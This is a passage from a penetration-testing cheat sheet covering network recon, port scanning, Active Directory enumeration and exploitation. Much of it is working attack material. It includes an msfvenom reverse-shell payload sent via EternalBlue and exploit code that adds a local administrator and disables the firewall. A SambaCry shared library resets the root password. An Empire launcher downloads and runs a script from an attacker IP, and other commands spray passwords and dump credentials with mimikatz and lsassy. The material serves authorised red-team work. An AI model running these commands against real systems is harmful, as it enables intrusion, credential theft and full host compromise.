and acts like a rogue proxy server and `mitm6.py` responds with the attacker's IP for all the incoming DNS queries. 4. Victims grab the WPAD file and ask the rogue IPv6 DNS server (attacker's machine) to resolve its location - resolved to attacker's machine. 5. Victims go to the rogue proxy server and there `ntlmrelayx.py` responses with `HTTP 407 Proxy Authentication`. ## Host Discovery ### ARP * [http://edublog.bitcrack.net/2016/09/scanning-network-using-netdiscover-arp.html](http://edublog.bitcrack.net/2016/09/scanning-network-using-netdiscover-arp.html) * [https://null-byte.wonderhowto.com/how-to/use-abuse-address-resolution-protocol-arp-locate-hosts-network-0150333/](https://null-byte.wonderhowto.com/how-to/use-abuse-address-resolution-protocol-arp-locate-hosts-network-0150333/) * [https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/](https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/) #### arp-scan Active: ``` $ arp-scan -l [-s <SPOOFED_IP>] -v $ arp-scan -I eth0 192.168.0.0/24 ``` #### netdiscover Passive: ``` $ netdiscover -i eth0 -r 192.168.0.0/24 -p ``` Active, sending 20 requests per IP: ``` $ netdiscover -i eth0 -r 192.168.0.0/24 -c 20 ``` ### Hunting for Subnets * [https://hub.packtpub.com/optimize-scans/](https://hub.packtpub.com/optimize-scans/) Take `10.0.0.0/8` as an example: ``` $ nmap -n -sn 10.0-255.0-255.1 -oA subnets/gateways -PE --min-rate 10000 --min-hostgroup 10000 $ grep 'Up' subnets/gateways.gnmap |cut -d' ' -f2 > subnets/ranges.txt $ sed -i subnets/ranges.txt -e 's/$/\/24/' ``` ### Ping Sweep Bash: ``` $ NET="0.0.0"; for i in $(seq 1 254); do (ping -c1 -W1 $NET.$i > /dev/null && echo "$NET.$i" |tee -a sweep.txt &); done Or $ NET="0.0.0"; for i in $(seq 1 254); do (ping -c1 -W1 "$NET.$i" |grep 'bytes from' |cut -d' ' -f4 |cut -d':' -f1 |tee -a sweep.txt &); done $ sort -u -t'.' -k4,4n sweep.txt > hosts/targets.txt && rm sweep.txt ``` Batch: ``` Cmd > set "NET=10.5.5" && for /L %i in (1,1,255) do @ping -n 1 -w 200 %NET%.%i > nul && echo %NET%.%i > sweep.txt ``` PowerShell (option 1): ``` PS > echo "[*] Scanning in progress...";1..254 |ForEach-Object {Get-WmiObject Win32_PingStatus -Filter "Address='10.10.100.$_' and Timeout=50 and ResolveAddressNames='false' and StatusCode=0" |select ProtocolAddress* |Out-File -Append -FilePath .\sweep.txt};echo "[+] Live hosts:"; Get-Content -Path .\sweep.txt | ? { $_ -match "10.10.100" }; echo "[*] Done.";del .\sweep.txt ``` PowerShell (option 2): ``` PS > $NET="192.168.0";for($i=1;$i -lt 255;$i++){$command="ping -n 1 -w 100 $NET.$i > nul 2>&1 && echo $NET.$i";start-process -nonewwindow cmd -argumentlist "/c $command" -redirectstandardoutput "tmp$i.txt"};cat tmp*.txt > sweep.txt PS > rm tmp*.txt ``` Nmap: ``` $ nmap -n -sn -iL subnets/ranges.txt -oA hosts/pingsweep -PE $ grep 'Up' hosts/pingsweep.gnmap |cut -d' ' -f2 |sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n > hosts/targets.txt ``` ### RMI Sweep Remote Management Interfaces: | Port | Service | |------|--------------------| | 22 | SSH | | 3389 | RDP | | 2222 | SSH? | | 5900 | VNC | | 5985 | WinRM | | 5986 | WinRM over SSL/TLS | Nmap: ``` $ nmap -n -Pn -iL subnets/ranges.txt -oA hosts/rmisweep -p22,3389,2222,5900,5985,5986 [--min-rate 1280 --min-hostgroup 256] $ grep 'open' hosts/rmisweep.gnmap |cut -d' ' -f2 |sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n >> hosts/targets.txt ``` `Invoke-Portscan.ps1`: * [https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1) * [https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Portscan/](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Portscan/) ``` PS > Invoke-Portscan -Hosts 127.0.0.0/24 -sn -noProgressMeter PS > Invoke-Portscan -Hosts 127.0.0.0/24 -T 4 -TopPorts 25 -oA top25 PS > Invoke-Portscan -Hosts 127.0.0.1 -Pn -Ports "22,80,443" -oG ports ``` ## Services Automators: * [https://github.com/21y4d/nmapAutomator](https://github.com/21y4d/nmapAutomator) * [https://github.com/Tib3rius/AutoRecon](https://github.com/Tib3rius/AutoRecon) * [https://github.com/carlospolop/legion](https://github.com/carlospolop/legion) ### Raw Identification ``` $ nc -nv 10.10.13.37 4444 [-C] ``` ### Nmap XML Parsers `parsenmap.rb`: * [https://github.com/R3dy/parsenmap](https://github.com/R3dy/parsenmap) ``` $ git clone https://github.com/R3dy/parsenmap-rb ~/tools/parsenmap-rb && cd ~/tools/parsenmap-rb $ bundle install && ln -s ~/tools/parsenmap-rb/parsenmap.rb /usr/local/bin/parsenmap.rb && cd - $ parsenmap.rb --help ``` `nmaptocsv`: * [https://github.com/maaaaz/nmaptocsv](https://github.com/maaaaz/nmaptocsv) ``` $ git clone https://github.com/maaaaz/nmaptocsv ~/tools/nmaptocsv && cd ~/tools/nmaptocsv $ python3 -m pip install -r requirements.txt csvkit && ln -s ~/tools/nmaptocsv/nmaptocsv.py /usr/local/bin/nmaptocsv.py && cd - $ nmaptocsv.py --help ``` ### Ports (Quick) Echo: ``` $ IP="0.0.0.0"; for p in $(seq 1 49151); do (timeout 1 bash -c "echo '.' >/dev/tcp/$IP/$p && echo OPEN:$p" >> hosts/ports.txt &) 2>/dev/null; done $ sort -u -t':' -k1,1n hosts/ports.txt > hosts/echo-ports.txt && rm hosts/ports.txt ``` Netcat: ``` $ seq 1 49151 | xargs -n1 | xargs -P0 -I {} nc -nzv -w1 0.0.0.0 {} 2>&1 | grep -vE "timed out|now in progress|Connection refused" ``` Nmap: ``` $ nmap -n -Pn -iL hosts/targets.txt -oA services/?-top-ports [--top-ports ? -T4 --min-rate 1280 --min-hostgroup 256] $ grep 'open' services/?-top-ports.gnmap $ parsenmap.rb services/?-top-ports.xml $ nmaptocsv.py -x services/?-top-ports.xml -d',' -f ip-fqdn-port-protocol-service-version-os |csvlook -I $ nmap -n -Pn -iL hosts/targets.txt -oA services/quick-sweep -p22,25,53,80,443,445,1433,3306,3389,5800,5900,8080,8443 [-T4 --min-rate 1280 --min-hostgroup 256] $ grep 'open' services/quick-sweep.gnmap $ parsenmap.rb services/quick-sweep.xml $ nmaptocsv.py -x services/quick-sweep.xml -d',' -f ip-fqdn-port-protocol-service-version-os |csvlook -I ``` ### Ports (Full) ``` $ nmap -Pn -T3 [--min-rate 50000 --min-hostgroup 256] -sV --version-intensity 6 -iL targets.txt --open -p1-49151 -oA services/alltcp-versions ``` Define which NSE scripts ran: ``` $ grep '|_' services/alltcp-versions.nmap |cut -d'_' -f2 |cut -d' ' -f1 |sort -u |grep ':' ``` Look at HTTP titles: ``` $ grep -i 'http-title' services/alltcp-versions.nmap ``` Examine version scan: ``` $ parsenmap.rb services/alltcp-versions.xml > services/alltcp-versions.csv Or nmaptocsv.py -x services/alltcp-versions.xml -d',' -f ip-fqdn-port-protocol-service-version-os > services/alltcp-versions.csv ``` Split version scan by service names: ``` $ parsenmap.py -i services/alltcp-versions.xml ``` ### Tricks Grep only numbers to get a comma-separated list of ports: ``` $ cat nmap/initial.nmap | egrep -o '^[0-9]{1,5}' | awk -F/ '{ print $1 }' ORS=','; echo ``` Fast port discovery with Masscan + versions and scripts with Nmap: ``` $ sudo masscan --rate 1000 -e tun0 -p1-65535,U:0-65535 127.0.0.1 > masscan/ports $ ports=`cat masscan/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr "\n" ',' | sed 's/,$//'` $ sudo nmap -n -Pn -sVC [-sT] [-A] [--reason] -oA nmap/tcp 127.0.0.1 -p$ports ``` Fast port discovery with Nmap + versions and scripts with Nmap (TCP & UDP): ``` $ sudo nmap -n -Pn --min-rate 1000 -T4 127.0.0.1 -p- -v --open | tee nmap/ports_tcp.txt $ ports_tcp=`cat nmap/ports_tcp | grep '^[0-9]' | awk -F "/" '{print $1}' | tr "\n" ',' | sed 's/,$//'` $ sudo nmap -n -Pn -sVC [-sT] [-A] [--reason] -oA nmap/tcp 127.0.0.1 -p$ports_tcp $ sudo nmap -n -Pn -sU [--max-retries 1] 127.0.0.1 -v --open | tee nmap/ports_udp.txt $ ports_udp=`cat nmap/ports_udp | grep '^[0-9]' | awk -F "/" '{print $1}' | tr "\n" ',' | sed 's/,$//'` $ sudo nmap -n -Pn -sVCU [--reason] -oA nmap/udp 127.0.0.1 -p$ports_udp ``` Search for Nmap NSE scripts: ``` $ find /usr/share/nmap/scripts/ -type f | grep smb Or $ sudo nmap --script-updatedb $ cat /usr/share/nmap/scripts/script.db | grep smb ``` #### Port Scanners Top TCP ports: | Port | Service | |----------------------------------------------|----------------------------------| | 21 | FTP | | 22,2222 | SSH | | 23 | Telnet | | 25 | SMTP | | 53 | DNS | | 80,8080 | HTTP | | 88 | KDC | | 111 | SUNRPC | | 135 | MSRPC | | 137 | NetBIOS | | 139,445 | SMB over NetBIOS,SMB over TCP/IP | | 389,636 | LDAP,LDAP over SSL/TLS | | 443,8443 | SSL/TLS | | 593 | HTTP RPC Endpoint Mapper | | 623 | IPMI | | 873 | RSYNC | | 1090,1098,1099,4444,11099,47001,47002,10999 | Java RMI | | 1433 | MSSQL | | 1521 | Oracle | | 2049 | NFS | | 2375 | Docker | | 3268,3269 | Microsoft Global Catalog | | 3306 | MySQL/MariaDB | | 3389 | RDP | | 4786 | Cisco Smart Install | | 4848 | GlassFish | | 4990 | Atlassian Crowd | | 5432 | PostgreSQL | | 5555,5556 | HP Data Protector | | 5900 | VNC | | 5985,5986 | WinRM,WinRM over SSL/TLS | | 6066 | Apache Spark | | 6379 | Redis | | 7000-7004,8000-8003,9000-9003,9503,7070,7071 | WebLogic | | 8088 | Apache Hadoop | | 8383 | Zoho Manageengine Desktop | | 8500 | Hashicorp Consul | | 8686,9012,50500 | JMX | | 8880 | IBM WebSphere | | 8888 | Tornado | | 8983 | Apache Solr | | 9000 | Portainer | | 9100 | Printing | | 9200 | Elasticsearch | | 9389 | Active Directory Web Services | | 11111,4444,4445 | jBoss | | 27017 | MongoDB | | 45000,45001 | JDWP | TCP one-liner: ``` ports_tcp="21,22,23,25,53,80,88,111,135,137,139,389,443,445,593,623,636,873,1090,1098,1099,1433,1521,2049,2222,2375,3268,3269,3306,3389,4444,4445,4786,4848,4990,5432,5555,5556,5900,5985,5986,6066,6379,7000,7001,7002,7003,7004,7070,7071,8000,8001,8002,8003,8080,8088,8383,8443,8500,8686,8880,8888,8983,9000,9001,9002,9003,9012,9100,9200,9389,9503,10999,11099,11111,27017,45000,45001,47001,47002,50500" ``` Top UDP ports: | Port | Service | |------|------------| | 53 | DNS | | 67 | DHCP | | 69 | TFTP | | 88 | KDC | | 123 | NTP | | 137 | NetBIOS | | 161 | SNMP | | 500 | IKE | | 623 | IPMI | | 3391 | RD Gateway | UDP one-liner: ``` ports_udp="53,67,69,88,123,137,161,500,623,3391" ``` ##### Masscan * [https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) ``` $ sudo masscan [-e eth0] --rate 1000 -iL hosts.txt --open -p$ports --resume paused.conf >> masscan.out $ mkdir services && for p in `echo $ports | tr ',' ' '`; do grep "port $p/tcp" masscan.out | awk -F' ' '{print $6}' | sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n > "services/port$p.txt"; done ``` ##### RustScan * [https://github.com/RustScan/RustScan/wiki/Usage](https://github.com/RustScan/RustScan/wiki/Usage) ``` $ sudo rustscan -b 1000 -t 2000 -u 5000 -a hosts.txt -r $ports -g --no-config --scan-order "Random" > rustscan.out ``` Scan Nmap top 1000 TCP ports: * [https://github.com/RustScan/RustScan/wiki/Config-File](https://github.com/RustScan/RustScan/wiki/Config-File) ``` $ sudo wget https://gist.github.com/snovvcrash/c7f8223cc27154555496a9cbb4650681/raw/a76a2c658370d8b823a8a38a860e4d88051b417e/rustscan-ports-top1000.toml -O /root/.rustscan.toml $ sudo rustscan -a 10.10.13.37 --top ``` ##### Naabu * [https://github.com/projectdiscovery/naabu/releases](https://github.com/projectdiscovery/naabu/releases) ``` $ sudo naabu [-interface eth0] -iL hosts.txt -s s -rate 1000 -p - -silent [-nmap-cli 'sudo nmap -v -Pn -sVC -O -oA naabutest'] $ sudo naabu -host 10.10.13.37 -top-ports 1000 ``` ##### Nmap * [https://www.infosecmatter.com/why-does-nmap-need-root-privileges/](https://www.infosecmatter.com/why-does-nmap-need-root-privileges/) Flag `-A`: ``` nmap -A ... == nmap -sC -sV -O --traceroute ... ``` Host discovery flag: ``` nmap -sn ... == nmap -PS443 -PA80 -PE -PP ... -PS/PA/PU/PY [portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -PO [protocol list]: IP protocol ping ``` ## AD Environment Names Discover domain NetBIOS name: ``` PS > ([ADSI]"LDAP://megacorp.local").dc PS > $DomainName = (Get-ADDomain).DNSRoot PS > (Get-ADDomain -Server $DomainName).NetBIOSName ``` Discover DCs' FQDN names: ``` PS > nslookup -type=all _ldap._tcp.dc._msdcs.$env:userdnsdomain PS > $ldapFilter = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" PS > $searcher = [ADSISearcher]$ldapFilter PS > $searcher.FindAll() PS > $searcher.FindAll() | ForEach-Object { $_.GetDirectoryEntry() } Or PS > ([ADSISearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() |ForEach-Object { $_.GetDirectoryEntry() } PS > [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain().DomainControllers.Name Cmd > nltest /dsgetdc:megacorp.local PS > $DomainName = (Get-ADDomain).DNSRoot PS > $AllDCs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem PS > $AllDCs = (Get-ADForest).GlobalCatalogs PowerView3 > Get-DomainController | Select Name,IPAddress ``` Discover global catalog: ``` PS > Get-ADDomainController -Discover -Service "GlobalCatalog" ``` Discover MS Exchnage servers' FQDN names: * [https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers) ``` PS > Discover-PSMSExchangeServers | Select ServerName,Description | Tee-Object exch.txt ``` Discover MS SQL servers' FQDN names: * [https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers) ``` PS > Discover-PSMSSQLServers | Select ServerName,Description | Tee-Object mssql.txt ``` ### DC IPs Query DC for forest/domain FQDN to get corresponding DC IP addresses: ``` $ dig @10.10.13.37 megacorp.local $ dig @10.10.13.37 child.megacorp.local ``` ## NetBIOS Scanning ### nbtscan ``` $ sudo nbtscan -r 10.10.10.0/24 ``` ### nbname (MSF) ``` msf > use auxiliary/scanner/netbios/nbname ``` ## LHF ### net_api **CVE-2008-4250, MS08-067** Check: ``` $ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445 Or msf > use exploit/windows/smb/ms08_067_netapi msf > check ``` Exploit: ``` msf > use exploit/windows/smb/ms08_067_netapi msf > exploit ``` ### EternalBlue **CVE-2017-0144, MS17-010** #### MSF Check: ``` $ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445 Or msf > use auxiliary/scanner/smb/smb_ms17_010 ``` Exploit: ``` msf > exploit/windows/smb/ms17_010_eternalblue ``` #### Manually * [https://github.com/helviojunior/MS17-010](https://github.com/helviojunior/MS17-010) * [https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010](https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010) Send MSF payload and execute it with `send_and_execute.py`: ``` $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe $ python send_and_execute.py 10.10.13.38 rev.exe ``` Or just execute commands on host with `zzz_exploit.py`: ```python def smb_pwn(conn, arch): ... service_exec(conn, r'cmd /c net user snovvcrash Passw0rd! /add') service_exec(conn, r'cmd /c net localgroup administrators snovvcrash /add') service_exec(conn, r'cmd /c netsh firewall set opmode disable') ``` ### SambaCry **CVE-2017-7494** (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4) #### MSF ``` msf > use exploit/linux/samba/is_known_pipename msf > set SMB::AlwaysEncrypt false msf > set SMB::ProtocolVersion 1 ``` #### Manually * [https://github.com/joxeankoret/CVE-2017-7494](https://github.com/joxeankoret/CVE-2017-7494) Compile `.so` SUID shared library: ```c // gcc -shared -fPIC -o pwn.so pwn.c #include <stdio.h> #include <stdlib.h> static void pwn() __attribute__((constructor)); void pwn() { setresuid(0,0,0); system("echo 'root:Passw0rd!'|chpasswd"); } ``` Get real share path on the target's filesystem: ``` $ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37 path: /home/snovvcrash/sharename ``` Upload `pwn.so` to target and then run the exploit: ``` $ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p '' ``` ### BlueKeep **CVE-2019-0708** Check: ``` msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep ``` Exploit: ``` msf > exploit/windows/rdp/cve_2019_0708_bluekeep_rce ``` ## Generate Wordlists ### hashcat Potentially valid usernames, `John Doe` as an example: * [https://activedirectorypro.com/active-directory-user-naming-convention/](https://activedirectorypro.com/active-directory-user-naming-convention/) ``` $ cat << EOF >> passwords.txt johndoe jdoe j.doe doe EOF ``` Common usernames: ``` $ cat << EOF >> passwords.txt admin administrator root guest sa changeme password EOF ``` Common patterns: ``` $ cat << EOF >> passwords.txt January February March April May June July August September October November December Autumn Fall Spring Winter Summer password Password P@ssw0rd secret Secret S3cret EOF ``` Add year and exclamation point to the end of each password: ``` $ for i in $(cat passwords.txt); do echo "${i}"; echo "${i}\!"; echo "${i}2020"; echo "${i}2020\!"; done > t $ cp t passwords.txt ``` Mutate the wordlist with hashcat rules: ``` $ hashcat --force --stdout passwords.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule |sort -u |awk 'length($0) > 7' > t $ cp t passwords.txt ``` ### kwprocessor * [https://github.com/hashcat/kwprocessor](https://github.com/hashcat/kwprocessor) ``` $ ./kwp basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > passwords.txt ``` ### cewl ``` $ cewl -d 5 -m 5 -w passwords.txt --with-numbers --email_file emails.txt http://megacorp.local/somedir/logs/html/index.htm ``` ## Tools ### rpcclient ``` $ rpcclient -U '' -N 127.0.0.1 $ rpcclient -U 'snovvcrash%Passw0rd!' 127.0.0.1 rpcclient $> enumdomusers rpcclient $> enumdomgroups ``` ### enum4linux ``` $ enum4linux -v -a 127.0.0.1 | tee enum4linux.out ``` ### nullinux * [https://github.com/m8r0wn/nullinux](https://github.com/m8r0wn/nullinux) ``` $ git clone https://github.com/m8r0wn/nullinux ~/tools/nullinux && cd ~/tools/nullinux && sudo bash setup.sh && ln -s ~/tools/nullinux/nullinux.py /usr/local/bin/nullinux.py && cd - $ nullinux.py 127.0.0.1 ``` ### kerbrute * [https://github.com/ropnop/kerbrute](https://github.com/ropnop/kerbrute) ``` $ kerbrute --delay 100 -d megacorp.local -o kerbrute-passwordspray-123456.log passwordspray users.txt '123456' ``` ### DomainPasswordSpray * [https://github.com/dafthack/DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) ``` PS > Invoke-DomainPasswordSpray -UserList .\users.txt -Domain megacorp.local -Password 'Passw0rd!' -OutFile spray-results.txt ``` ### crowbar * [https://github.com/galkan/crowbar](https://github.com/galkan/crowbar) #### RDP ``` $ crowbar -b rdp -s 192.168.1.0/24 -u snovvcrash -c 'Passw0rd!' -l ~/ws/log/crowbar.log -o ~/ws/log/crowbar.out ``` ### impacket * [https://github.com/fortra/impacket](https://github.com/fortra/impacket) ``` $ git clone https://github.com/fortra/impacket ~/tools/impacket && cd ~/tools/impacket $ pip3 install . ``` #### lookupsid.py ``` $ lookupsid.py MEGACORP/snovvcrash:'Passw0rd!'@127.0.0.1 20000 | tee ~/ws/log/lookupsid.out $ cat ~/ws/log/lookupsid.out | grep SidTypeUser | grep -v -e '\$' -e HealthMailbox | awk -F'\' '{print $2}' | awk '{print $1}' | perl -nle 'print if m{^[[:ascii:]]+$}' > ~/ws/enum/allusers.txt ``` ### adidnsdump * [https://github.com/dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) ``` $ cd ~/ws/enum/ $ adidnsdump -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.megacorp.local $ mv records.csv adidnsdump.csv ``` Check with ldapsearch: ``` $ ldapsearch -H ldap://10.10.13.37:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local' '(objectClass=*)' dnsRecord dNSTombstoned name ``` ### CrackMapExec Install bleeding-edge: ``` $ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec ~/tools/CrackMapExec && cd ~/tools/CrackMapExec $ poetry install $ poetry run crackmapexec -h Or $ pipx install crackmapexec $ cme -h ``` Use: ``` $ cme smb 127.0.0.1 $ cme smb 127.0.0.1 -u anonymous -p '' --shares $ cme smb 127.0.0.1 -u '' -p '' -d WORKGROUP --shares $ cme smb 127.0.0.1 -u nullinux_users.txt -p passwords.txt --shares [--no-bruteforce] [--continue-on-success] $ cme smb 127.0.0.1 -u snovvcrash -p 'Passw0rd!' --spider-folder 'E\$' --pattern s3cret $ cme smb 127.0.0.1 -u j.doe -p 'Passw0rd!' -d 'CORP' --spider Users --pattern '.' $ cme smb 127.0.0.1 -u snovvcrash -p '' --local-auth --sam $ cme smb 127.0.0.1 -u snovvcrash -p '' -M spider_plus $ cme smb 127.0.0.1 -u snovvcrash -p '' -M mimikatz $ cme smb 127.0.0.1 -u snovvcrash -p '' -M lsassy ``` ### Empire * [https://github.com/BC-SECURITY/Empire](https://github.com/BC-SECURITY/Empire) Install: ``` $ git clone https://github.com/BC-SECURITY/Empire ~/tools/Empire && cd ~/tools/Empire $ sudo STAGING_KEY=`echo 'H4ckTh3Pl4net!' | md5sum | cut -d' ' -f1` ./setup/install.sh $ sudo poetry install $ echo $'#!/usr/bin/env bash\n\nsudo poetry run python empire' > ~/tools/Empire/run_empire.sh $ chmod +x ~/tools/Empire/run_empire.sh ``` Pwsh launcher string: ``` PS > powershell -NoP -sta -NonI -W Hidden -Exec Bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/launcher.ps1')" ``` ### Bloodhound #### Setup ``` $ sudo apt install neo4j $ sudo mkdir -p /usr/share/neo4j/logs/ $ sudo neo4j console ...change default password at localhost:7474... $ sudo neo4j start $ wget https://github.com/BloodHoundAD/BloodHound/releases/latest $ unzip BloodHound-linux-x64.zip && rm BloodHound-linux-x64.zip && cd BloodHound-linux-x64 $ sudo ./BloodHound --no-sandbox Or $ sudo chown root:root chrome-sandbox $ sudo chmod 4755 chrome-sandbox $ ./BloodHound ``` #### Collectors ##### SharpHound.ps1 ``` PS > Invoke-Bloodhound -CollectionMethod All,GPOLocalGroup -Domain megacorp.local -LDAPUser snovvcrash -LDAPPass 'Passw0rd!' PS > Invoke-Bloodhound -CollectionMethod SessionLoop -Domain megacorp.local ``` ##### SharpHound.exe ``` PS > .\SharpHound.exe -c All,GPOLocalGroup -d megacorp.local --ldapusername snovvcrash --ldappassword 'Passw0rd!' PS > .\SharpHound.exe -c SessionLoop -d megacorp.local ``` #### Cypher * [https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/](https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/) Show percentage of collected user sessions: * [https://youtu.be/q86VgM2Tafc](https://youtu.be/q86VgM2Tafc) ``` # http://localhost:7474/browser/ MATCH (u1:User) WITH COUNT(u1) AS totalUsers MATCH (c:Computer)-[r:HasSession]->(u2:User) WITH totalUsers, COUNT(DISTINCT(u2)) AS usersWithSessions RETURN totalUsers, usersWithSessions, 100 * usersWithSessions / totalUsers AS percetange ``` #### BloodHound.py * [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) ``` $ cd ~/ws/enum/bloodhound/bloodhound.py/ $ bloodhound-python -c All,LoggedOn -u snovvcrash -p 'Passw0rd!' -d megacorp.local -ns 127.0.0.1 ``` ### dementor.py * [https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc](https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc) ``` $ ./dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local ``` ### printerbug.py * [https://https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) ``` $ ./printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37 ``` ### cve-2019-1040-scanner * [https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py](https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py) ``` $ ./scan.py MEGACORP/snovvcrash:'Passw0rd!'@10.10.13.37 $ ./scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!' ``` ### spraykatz * [https://github.com/aas-n/spraykatz](https://github.com/aas-n/spraykatz) ``` $ ./spraykatz.py -u snovvcrash -p 'Passw0rd!' -t 10.10.13.37,10.10.13.38,10.10.13.39 ``` ### PowerView * [https://www.harmj0y.net/blog/powershell/make-powerview-great-again/](https://www.harmj0y.net/blog/powershell/make-powerview-great-again/) * [https://github.com/HarmJ0y/CheatSheets/blob/master/PowerView.pdf](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerView.pdf) * [https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) * [PowerView2.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1) * [PowerView3.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) * [PowerView3.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1#L5907-L6122) [(New-GPOImmediateTask)](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) * [PowerView4.ps1](https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1) [(ZeroDayLab)](https://exploit.ph/powerview.html) ``` PowerView3 > Get-DomainComputer -Properties Name | Resolve-IPAddress ``` ### PowerUp * [https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) * [https://github.com/HarmJ0y/CheatSheets/blob/master/PowerUp.pdf](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerUp.pdf) * [https://recipeforroot.com/advanced-powerup-ps1-usage/](https://recipeforroot.com/advanced-powerup-ps1-usage/) ``` PS > Invoke-PrivescAudit ``` ### PowerUpSQL * [https://github.com/NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) ``` PS > Get-SQLInstanceDomain PS > Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 -UserName sa -Password 'Passw0rd!' -Verbose PS > Invoke-SQLOSCmd -UserName sa -Password 'Passw0rd!' -Instance sqlsrv01.megacorp.local -Command whoami PS > Invoke-SQLAudit -Instance WEB01 -UserName sa -Password 'Passw0rd!' -Verbose ``` ### Windows-Exploit-Suggester * [https://github.com/AonCyberLabs/Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) ``` $ python -u windows-exploit-suggester.py -d 2020-09-02-mssb.xls -i systeminfo.txt --ostext 'windows 10 64-bit' --hotfixes hotfixes.txt | tee wes.out ``` ### JAWS * [https://github.com/411Hall/JAWS/blob/master/jaws-enum.ps1](https://github.com/411Hall/JAWS/blob/master/jaws-enum.ps1) ``` PS > .\jaws-enum.ps1 -OutputFileName jaws-enum.txt ``` ### winPEAS * [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe) ### PrivescCheck * [https://github.com/itm4n/PrivescCheck](https://github.com/itm4n/PrivescCheck) ``` PS > powershell.exe -exec bypass -c ". .\privesccheck.ps1; Invoke-PrivescCheck -Extended | Tee-Object privesccheck-out.txt" ``` ### Seatbelt * [https://github.com/GhostPack/Seatbelt](https://github.com/GhostPack/Seatbelt) * [https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1) ``` PS > .\Seatbelt.exe CredEnum PS > .\Seatbelt.exe ScheduledTasks PS > Invoke-Seatbelt -Command "-group=all" ``` ## 